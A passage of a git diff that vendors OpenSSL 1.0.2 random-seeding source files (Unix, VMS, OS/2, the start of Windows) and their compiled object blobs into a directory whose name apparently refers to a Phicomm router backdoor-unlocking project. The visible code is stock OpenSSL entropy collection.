+    if (DosPerfSysCall) {
+        CPUUTIL util;
+
+        if (DosPerfSysCall(CMD_KI_RDCNT, (ULONG) & util, 0, 0) == 0) {
+            RAND_add(&util, sizeof(util), 10);
+        } else {
+# ifndef __KLIBC__
+            DosPerfSysCall = NULL;
+# endif
+        }
+    }
+
+    /*
+     * DosQuerySysState() gives us a huge quantity of process, thread, memory
+     * & handle stats
+     */
+    if (DosQuerySysState) {
+        char *buffer = OPENSSL_malloc(256 * 1024);
+
+        if (DosQuerySysState(0x1F, 0, 0, 0, buffer, 256 * 1024) == 0) {
+            /*
+             * First 4 bytes in buffer is a pointer to the thread count there
+             * should be at least 1 byte of entropy per thread
+             */
+            RAND_add(buffer, 256 * 1024, **(ULONG **) buffer);
+        }
+
+        OPENSSL_free(buffer);
+        return 1;
+    }
+
+    return 0;
+}
+
+#endif                          /* OPENSSL_SYS_OS2 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_os2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_os2.o
new file mode 100644
index 0000000000000000000000000000000000000000..c819196a8f3422c886e83448febbbcdb18d3c47b
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ECm!@Bc!?(!?UGhS^dNy!dlB(c@E}N%28EKOBpYZi`WO5;9{ZR4
z1v-=L;<B51=)mOdynSzWvS~jC_jfJF0TmA1!e6CWfG>^oE82%`*a8^#`#0|KC@fP^
zy4U=id!6o8S(V-Qp2xk5lbWu3wGnnP*D!|<BWM9Eh+~-l1s&gp@1G_OYn+&RV)uq%
zOHO0eRJMV^x=kX(a3U-6ARWJCMUO`SyqG5<2oXhI<C|KEcqV|40}%iZivoC*B}tqj
zmu4d7cr~3u1kps+uW8Arc{Yu6F}IFfg*ZSH-KqIz{*q?e=dTop_$1E!Zhp0EKTQ7-
zN;WZ9^`D`adU}|8__8?FNnES*6<%tbE}iIwwpKnx4REo6Y5u~dQs7EdK<}yt^)tP+
s|0zWaiR4pB)V}2LpJ&}2Z9U3Ccce~%IsYDRn0HUwXDNJAMv12X7qrAVcmMzZ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_unix.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_unix.c
new file mode 100644
index 0000000..266111e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_unix.c
@@ -0,0 +1,447 @@
+/* crypto/rand/rand_unix.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+
+#define USE_SOCKETS
+#include "e_os.h"
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include "rand_lcl.h"
+
+#if !(defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_VMS) || defined(OPENSSL_SYS_OS2) || defined(OPENSSL_SYS_VXWORKS) || defined(OPENSSL_SYS_NETWARE))
+
+# include <sys/types.h>
+# include <sys/time.h>
+# include <sys/times.h>
+# include <sys/stat.h>
+# include <fcntl.h>
+# include <unistd.h>
+# include <time.h>
+# if defined(OPENSSL_SYS_LINUX) /* should actually be available virtually
+                                 * everywhere */
+#  include <poll.h>
+# endif
+# include <limits.h>
+# ifndef FD_SETSIZE
+#  define FD_SETSIZE (8*sizeof(fd_set))
+# endif
+
+# if defined(OPENSSL_SYS_VOS)
+
+/*
+ * The following algorithm repeatedly samples the real-time clock (RTC) to
+ * generate a sequence of unpredictable data.  The algorithm relies upon the
+ * uneven execution speed of the code (due to factors such as cache misses,
+ * interrupts, bus activity, and scheduling) and upon the rather large
+ * relative difference between the speed of the clock and the rate at which
+ * it can be read.
+ *
+ * If this code is ported to an environment where execution speed is more
+ * constant or where the RTC ticks at a much slower rate, or the clock can be
+ * read with fewer instructions, it is likely that the results would be far
+ * more predictable.
+ *
+ * As a precaution, we generate 4 times the minimum required amount of seed
+ * data.
+ */
+
+int RAND_poll(void)
+{
+    short int code;
+    gid_t curr_gid;
+    pid_t curr_pid;
+    uid_t curr_uid;
+    int i, k;
+    struct timespec ts;
+    unsigned char v;
+
+#  ifdef OPENSSL_SYS_VOS_HPPA
+    long duration;
+    extern void s$sleep(long *_duration, short int *_code);
+#  else
+#   ifdef OPENSSL_SYS_VOS_IA32
+    long long duration;
+    extern void s$sleep2(long long *_duration, short int *_code);
+#   else
+#    error "Unsupported Platform."
+#   endif                       /* OPENSSL_SYS_VOS_IA32 */
+#  endif                        /* OPENSSL_SYS_VOS_HPPA */
+
+    /*
+     * Seed with the gid, pid, and uid, to ensure *some* variation between
+     * different processes.
+     */
+
+    curr_gid = getgid();
+    RAND_add(&curr_gid, sizeof curr_gid, 1);
+    curr_gid = 0;
+
+    curr_pid = getpid();
+    RAND_add(&curr_pid, sizeof curr_pid, 1);
+    curr_pid = 0;
+
+    curr_uid = getuid();
+    RAND_add(&curr_uid, sizeof curr_uid, 1);
+    curr_uid = 0;
+
+    for (i = 0; i < (ENTROPY_NEEDED * 4); i++) {
+        /*
+         * burn some cpu; hope for interrupts, cache collisions, bus
+         * interference, etc.
+         */
+        for (k = 0; k < 99; k++)
+            ts.tv_nsec = random();
+
+#  ifdef OPENSSL_SYS_VOS_HPPA
+        /* sleep for 1/1024 of a second (976 us).  */
+        duration = 1;
+        s$sleep(&duration, &code);
+#  else
+#   ifdef OPENSSL_SYS_VOS_IA32
+        /* sleep for 1/65536 of a second (15 us).  */
+        duration = 1;
+        s$sleep2(&duration, &code);
+#   endif                       /* OPENSSL_SYS_VOS_IA32 */
+#  endif                        /* OPENSSL_SYS_VOS_HPPA */
+
+        /* get wall clock time.  */
+        clock_gettime(CLOCK_REALTIME, &ts);
+
+        /* take 8 bits */
+        v = (unsigned char)(ts.tv_nsec % 256);
+        RAND_add(&v, sizeof v, 1);
+        v = 0;
+    }
+    return 1;
+}
+# elif defined __OpenBSD__
+int RAND_poll(void)
+{
+    u_int32_t rnd = 0, i;
+    unsigned char buf[ENTROPY_NEEDED];
+
+    for (i = 0; i < sizeof(buf); i++) {
+        if (i % 4 == 0)
+            rnd = arc4random();
+        buf[i] = rnd;
+        rnd >>= 8;
+    }
+    RAND_add(buf, sizeof(buf), ENTROPY_NEEDED);
+    memset(buf, 0, sizeof(buf));
+
+    return 1;
+}
+# else                          /* !defined(__OpenBSD__) */
+int RAND_poll(void)
+{
+    unsigned long l;
+    pid_t curr_pid = getpid();
+#  if defined(DEVRANDOM) || defined(DEVRANDOM_EGD)
+    unsigned char tmpbuf[ENTROPY_NEEDED];
+    int n = 0;
+#  endif
+#  ifdef DEVRANDOM
+    static const char *randomfiles[] = { DEVRANDOM };
+    struct stat randomstats[sizeof(randomfiles) / sizeof(randomfiles[0])];
+    int fd;
+    unsigned int i;
+#  endif
+#  ifdef DEVRANDOM_EGD
+    static const char *egdsockets[] = { DEVRANDOM_EGD, NULL };
+    const char **egdsocket = NULL;
+#  endif
+
+#  ifdef DEVRANDOM
+    memset(randomstats, 0, sizeof(randomstats));
+    /*
+     * Use a random entropy pool device. Linux, FreeBSD and OpenBSD have
+     * this. Use /dev/urandom if you can as /dev/random may block if it runs
+     * out of random entries.
+     */
+
+    for (i = 0; (i < sizeof(randomfiles) / sizeof(randomfiles[0])) &&
+         (n < ENTROPY_NEEDED); i++) {
+        if ((fd = open(randomfiles[i], O_RDONLY
+#   ifdef O_NONBLOCK
+                       | O_NONBLOCK
+#   endif
+#   ifdef O_BINARY
+                       | O_BINARY
+#   endif
+#   ifdef O_NOCTTY              /* If it happens to be a TTY (god forbid), do
+                                 * not make it our controlling tty */
+                       | O_NOCTTY
+#   endif
+             )) >= 0) {
+            int usec = 10 * 1000; /* spend 10ms on each file */
+            int r;
+            unsigned int j;
+            struct stat *st = &randomstats[i];
+
+            /*
+             * Avoid using same input... Used to be O_NOFOLLOW above, but
+             * it's not universally appropriate...
+             */
+            if (fstat(fd, st) != 0) {
+                close(fd);
+                continue;
+            }
+            for (j = 0; j < i; j++) {
+                if (randomstats[j].st_ino == st->st_ino &&
+                    randomstats[j].st_dev == st->st_dev)
+                    break;
+            }
+            if (j < i) {
+                close(fd);
+                continue;
+            }
+
+            do {
+                int try_read = 0;
+
+#   if defined(OPENSSL_SYS_BEOS_R5)
+                /*
+                 * select() is broken in BeOS R5, so we simply try to read
+                 * something and snooze if we couldn't
+                 */
+                try_read = 1;
+
+#   elif defined(OPENSSL_SYS_LINUX)
+                /* use poll() */
+                struct pollfd pset;
+
+                pset.fd = fd;
+                pset.events = POLLIN;
+                pset.revents = 0;
+
+                if (poll(&pset, 1, usec / 1000) < 0)
+                    usec = 0;
+                else
+                    try_read = (pset.revents & POLLIN) != 0;
+
+#   else
+                /* use select() */
+                fd_set fset;
+                struct timeval t;
+
+                t.tv_sec = 0;
+                t.tv_usec = usec;
+
+                if (FD_SETSIZE > 0 && (unsigned)fd >= FD_SETSIZE) {
+                    /*
+                     * can't use select, so just try to read once anyway
+                     */
+                    try_read = 1;
+                } else {
+                    FD_ZERO(&fset);
+                    FD_SET(fd, &fset);
+
+                    if (select(fd + 1, &fset, NULL, NULL, &t) >= 0) {
+                        usec = t.tv_usec;
+                        if (FD_ISSET(fd, &fset))
+                            try_read = 1;
+                    } else
+                        usec = 0;
+                }
+#   endif
+
+                if (try_read) {
+                    r = read(fd, (unsigned char *)tmpbuf + n,
+                             ENTROPY_NEEDED - n);
+                    if (r > 0)
+                        n += r;
+#   if defined(OPENSSL_SYS_BEOS_R5)
+                    if (r == 0)
+                        snooze(t.tv_usec);
+#   endif
+                } else
+                    r = -1;
+
+                /*
+                 * Some Unixen will update t in select(), some won't.  For
+                 * those who won't, or if we didn't use select() in the first
+                 * place, give up here, otherwise, we will do this once again
+                 * for the remaining time.
+                 */
+                if (usec == 10 * 1000)
+                    usec = 0;
+            }
+            while ((r > 0 ||
+                    (errno == EINTR || errno == EAGAIN)) && usec != 0
+                   && n < ENTROPY_NEEDED);
+
+            close(fd);
+        }
+    }
+#  endif                        /* defined(DEVRANDOM) */
+
+#  ifdef DEVRANDOM_EGD
+    /*
+     * Use an EGD socket to read entropy from an EGD or PRNGD entropy
+     * collecting daemon.
+     */
+
+    for (egdsocket = egdsockets; *egdsocket && n < ENTROPY_NEEDED;
+         egdsocket++) {
+        int r;
+
+        r = RAND_query_egd_bytes(*egdsocket, (unsigned char *)tmpbuf + n,
+                                 ENTROPY_NEEDED - n);
+        if (r > 0)
+            n += r;
+    }
+#  endif                        /* defined(DEVRANDOM_EGD) */
+
+#  if defined(DEVRANDOM) || defined(DEVRANDOM_EGD)
+    if (n > 0) {
+        RAND_add(tmpbuf, sizeof tmpbuf, (double)n);
+        OPENSSL_cleanse(tmpbuf, n);
+    }
+#  endif
+
+    /* put in some default random data, we need more than just this */
+    l = curr_pid;
+    RAND_add(&l, sizeof(l), 0.0);
+    l = getuid();
+    RAND_add(&l, sizeof(l), 0.0);
+
+    l = time(NULL);
+    RAND_add(&l, sizeof(l), 0.0);
+
+#  if defined(OPENSSL_SYS_BEOS)
+    {
+        system_info sysInfo;
+        get_system_info(&sysInfo);
+        RAND_add(&sysInfo, sizeof(sysInfo), 0);
+    }
+#  endif
+
+#  if defined(DEVRANDOM) || defined(DEVRANDOM_EGD)
+    return 1;
+#  else
+    return 0;
+#  endif
+}
+
+# endif                         /* defined(__OpenBSD__) */
+#endif                          /* !(defined(OPENSSL_SYS_WINDOWS) ||
+                                 * defined(OPENSSL_SYS_WIN32) ||
+                                 * defined(OPENSSL_SYS_VMS) ||
+                                 * defined(OPENSSL_SYS_OS2) ||
+                                 * defined(OPENSSL_SYS_VXWORKS) ||
+                                 * defined(OPENSSL_SYS_NETWARE)) */
+
+#if defined(OPENSSL_SYS_VXWORKS)
+int RAND_poll(void)
+{
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_unix.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_unix.o
new file mode 100644
index 0000000000000000000000000000000000000000..79846bb5fa6256104741d84f67d1fb63e79a900c
GIT binary patch
literal 3736
zcmcJRO>7%Q6oALE)4C8gZYU*CC<c})Db2=Cibx8IvaXX(kV#RK&<ZHqjlKC%Y_GA`
zAweaj3aPM+OOJ2>RY*ukaOeRcTA|1yE#XQfgw#qLDh`zj1c-zX6q)ySXOhX*<^bYJ
zn|bri`x(Etvy&5jvHm)bhj8(b9<n~;l#u4z*7aUn?IlfQD_L#a`G<N~eKuBl45>Pz
z4)=w>9~lZ?r6+&*9U>)Y(f3FTEYZU2@^t{=a;$V*4qQj`^GWzqh{_GL6qTE4!6(z=
zlXAFBi+kkNj|Pf8i)0IW*v4w%(n7iMjiMdvr^2!g7s~lOWRSy`qutl6`)ToMKkcUe
z{1(s%?e<%TD__w1GvIUMy9@Xm7V+1`3YBOfDF>FL@;02aP&2!Ki^|(Q*25Qq0BL+F
zT3BhlLQ9|cz5**6zs&6B>O8pQ?5c8cVE#)#J$VU}sPi}LUfweQ=L3zWdn%O*Ewuq8
z>gPfDON*}(x=^upL13^r@ldpIjmK`iB7~;%m;5)rUbt$>zc%h(qNR^zOuuNyU|DH=
zm9D9F{ovO$9xgBXF;QWKLQ$O(+i``JLV0~HTyd|iuhF8@t_1CL`e)VK#`NSxZ0l!O
zw&#zkFQ`Y=7gcSkeOk}9XY=WHV?5E8G0h}tPZ-m}%&_9_S=!2)nOVm$pViX|Gv!P~
zJ;x@H?thg7`}gk)wv3GC(^fv%t#m4(w(#S5dm5hW2q~extqyi};e#OnPdz*b21iI8
zA!TG<cu=-E1M$3ah<IiKo*fOF{b!(NG2r*HH9t6!ekt%)T|{a=?H!PUC0|5pd9yw$
zg-&f!rLOtS1JXI4_gjzD)h~rqsU;!>!89TTA`&+G9|YUuBfnItnRu(7aNIlJ{YEb@
zL~_d=06b)U6V1$Er_DF5nYXNI7$2*3t9Z$}y}0TX;&0@)i_<mTOB&X6QSlPo?XBV^
z!bgoQD=;<*^|5;dtP39Ow_64QRO2Hx_;WRQXAOR=1~+Q(sT%yX8oW@0zf*&st-(L2
z!3iE;EuWs8QR234rp6|dMo#JK=nfJ1Smez3lwsNPz2uNO7}YXnGD)-pv4ascrXB3>
zAL<*{hSf-{Pb1@om6=QsGh?L5SkBTdk~Q=Mi6_mR;W)pPH?p%D#MMS;EhFbZJ&_;>
zpXnPM8j5N0q@kz58bakElr@<$h^9fT_>>l(n9|1dNxYQ!8-_;|t{`#~zUC<VKu6){
zpYw4C+k7kNoF5l>lfah+ey6}!1diVj9_KHC-zD$|@t}j?KJhei`==PkeQp<cPT+S7
zd`{qamU*0a1uojZFYtQ=`||=9?aKncSFry^;G+GH0^cFngK7&dZ)Q3U{7b|+)*6MM
zP0oWhh5u*R$T^;SQ8<5sL3e!0xI6wZ<3ToJU+`HIB{!S0^iiVZtgJIma4l;jb;UAf
zETSZIODD=`E=QECi4!yrD`A+Tkxf8Tl4e{_x?$GjJZ`2^MjGO!P0LW=o@%pSbT%JP
z=amdx!A91aWigBiZ7i$9k@&9?gaBAW_m{mF7z+QcIy1+X>o{W1@!jo(N0esP^tUlM
zNFzL`^8WC??qb}1qtOk`03#+W9G{Xspkd5^>mLSRjM)K?C_KL|LeP1BKK3!@&R=Hx
zZ*lntUGrX;SF7JSR;Xjl9_xoaa@P;<Dcp-Y|IaKxuQQm~!p{Mp<Na4He*izGAk-P`
z{$Xx+{uD6GA7XZV@Usm)$^jdB-S{{Soa>@#r~3!F{JHHZQ1DfAzb;+OKgbQ)$oJ3j
zd!S%`xBn65Kfw*z==R6^w_5#<u=?@(WB>5K8}83}wcMDh%<`XQ8^gXyRs1ncwNf2p
a2l`W37sXv`yaTKGXW0Hf6rDkL`~M9r-3!71

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_vms.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_vms.c
new file mode 100644
index 0000000..a7179a4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_vms.c
@@ -0,0 +1,159 @@
+/* crypto/rand/rand_vms.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte <richard@levitte.org> for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/rand.h>
+#include "rand_lcl.h"
+
+#if defined(OPENSSL_SYS_VMS)
+
+# include <descrip.h>
+# include <jpidef.h>
+# include <ssdef.h>
+# include <starlet.h>
+# ifdef __DECC
+#  pragma message disable DOLLARID
+# endif
+
+/*
+ * Use 32-bit pointers almost everywhere.  Define the type to which to cast a
+ * pointer passed to an external function.
+ */
+# if __INITIAL_POINTER_SIZE == 64
+#  define PTR_T __void_ptr64
+#  pragma pointer_size save
+#  pragma pointer_size 32
+# else                          /* __INITIAL_POINTER_SIZE == 64 */
+#  define PTR_T void *
+# endif                         /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+static struct items_data_st {
+    short length, code;         /* length is amount of bytes */
+} items_data[] = {
+    {
+        4, JPI$_BUFIO
+    },
+    {
+        4, JPI$_CPUTIM
+    },
+    {
+        4, JPI$_DIRIO
+    },
+    {
+        8, JPI$_LOGINTIM
+    },
+    {
+        4, JPI$_PAGEFLTS
+    },
+    {
+        4, JPI$_PID
+    },
+    {
+        4, JPI$_WSSIZE
+    },
+    {
+        0, 0
+    }
+};
+
+int RAND_poll(void)
+{
+    long pid, iosb[2];
+    int status = 0;
+    struct {
+        short length, code;
+        long *buffer;
+        int *retlen;
+    } item[32], *pitem;
+    unsigned char data_buffer[256];
+    short total_length = 0;
+    struct items_data_st *pitems_data;
+
+    pitems_data = items_data;
+    pitem = item;
+
+    /* Setup */
+    while (pitems_data->length && (total_length + pitems_data->length <= 256)) {
+        pitem->length = pitems_data->length;
+        pitem->code = pitems_data->code;
+        pitem->buffer = (long *)&data_buffer[total_length];
+        pitem->retlen = 0;
+        total_length += pitems_data->length;
+        pitems_data++;
+        pitem ++;
+    }
+    pitem->length = pitem->code = 0;
+
+    /*
+     * Scan through all the processes in the system and add entropy with
+     * results from the processes that were possible to look at.
+     * However, view the information as only half trustable.
+     */
+    pid = -1;                   /* search context */
+    while ((status = sys$getjpiw(0, &pid, 0, item, iosb, 0, 0))
+           != SS$_NOMOREPROC) {
+        if (status == SS$_NORMAL) {
+            RAND_add((PTR_T) data_buffer, total_length, total_length / 2);
+        }
+    }
+    sys$gettim(iosb);
+    RAND_add((PTR_T) iosb, sizeof(iosb), sizeof(iosb) / 2);
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_win.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_win.c
new file mode 100644
index 0000000..06670ae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_win.c
@@ -0,0 +1,752 @@
+/* crypto/rand/rand_win.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
